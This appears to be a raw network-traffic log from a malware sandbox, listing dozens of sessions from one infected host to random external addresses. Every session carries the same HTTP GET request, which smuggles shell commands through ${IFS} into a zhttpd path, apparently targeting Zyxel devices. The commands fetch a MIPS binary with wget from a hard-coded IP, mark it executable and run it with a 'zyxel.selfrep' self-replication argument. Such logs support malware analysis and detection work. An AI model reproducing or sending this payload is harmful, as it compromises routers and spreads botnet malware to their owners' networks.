                                                        Feb 2, 2024 06:21:16.042560101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5897192.168.2.1452740143.232.195.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042614937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5898192.168.2.14468564.34.22.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042654037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5899192.168.2.1450852139.44.227.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042685032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5900192.168.2.146004076.191.143.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042728901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5901192.168.2.144593642.4.243.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042776108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5902192.168.2.145270461.37.93.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042815924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5903192.168.2.1458348141.28.99.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042850018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5904192.168.2.1447444106.5.33.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042902946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5905192.168.2.1433058191.23.150.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042943001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5906192.168.2.144138059.202.100.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043005943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5907192.168.2.143746288.105.76.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043046951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5908192.168.2.1437018157.239.156.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043095112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5909192.168.2.1457296156.136.45.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043128014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5910192.168.2.1453748121.123.181.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043174982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5911192.168.2.1460582151.198.209.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043217897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5912192.168.2.144338043.178.14.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043267012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5913192.168.2.143795247.38.236.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043312073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5914192.168.2.1453016126.143.189.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043344975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5915192.168.2.145371880.224.6.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043395042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5916192.168.2.143615044.172.85.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043425083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5917192.168.2.1444630204.214.156.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043462038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5918192.168.2.1450920120.181.63.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043500900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5919192.168.2.144961669.136.135.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043541908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5920192.168.2.145599634.182.82.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043580055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5921192.168.2.1439114182.156.24.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043628931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5922192.168.2.1457014186.19.57.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043669939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5923192.168.2.145329282.34.32.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043704987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5924192.168.2.1455412126.94.227.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043731928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5925192.168.2.1458618105.180.138.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043771982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5926192.168.2.1440748223.242.224.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043811083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5927192.168.2.1439076173.48.134.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043890953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5928192.168.2.144828640.234.107.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043905973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5929192.168.2.144576877.144.17.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.043943882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5930192.168.2.145569295.158.117.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044006109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5931192.168.2.145129482.119.168.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044037104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5932192.168.2.1433558135.32.200.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044095993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5933192.168.2.1441640207.196.123.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044145107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5934192.168.2.1434878129.27.180.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044174910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5935192.168.2.1438464180.178.163.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044226885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5936192.168.2.1434936161.168.196.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044269085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5937192.168.2.144354427.65.32.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044337988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5938192.168.2.1436158205.155.66.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044363022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5939192.168.2.1446946105.68.37.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044390917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5940192.168.2.1441424195.117.104.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044418097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5941192.168.2.1435452103.91.11.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044455051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5942192.168.2.144444299.219.233.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044493914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5943192.168.2.1456408196.169.64.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044528008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5944192.168.2.145233641.70.164.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044589043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5945192.168.2.1456368205.65.7.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044619083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5946192.168.2.14468169.139.240.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044665098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5947192.168.2.1457838132.166.32.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044709921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5948192.168.2.145420651.23.133.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044744015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5949192.168.2.144478266.142.127.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044789076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5950192.168.2.1447856111.184.20.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044810057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5951192.168.2.1458912196.208.130.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044850111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5952192.168.2.145788459.72.7.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044877052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5953192.168.2.1455682203.181.108.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044934988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5954192.168.2.143888068.200.154.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044966936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5955192.168.2.1447074220.247.100.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.044995070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5956192.168.2.144894493.51.66.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045047998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5957192.168.2.145728657.178.55.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045094013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5958192.168.2.1439242143.161.210.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045128107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5959192.168.2.143348234.24.203.190443
                                                        TimestampBytes transferredDirectionData
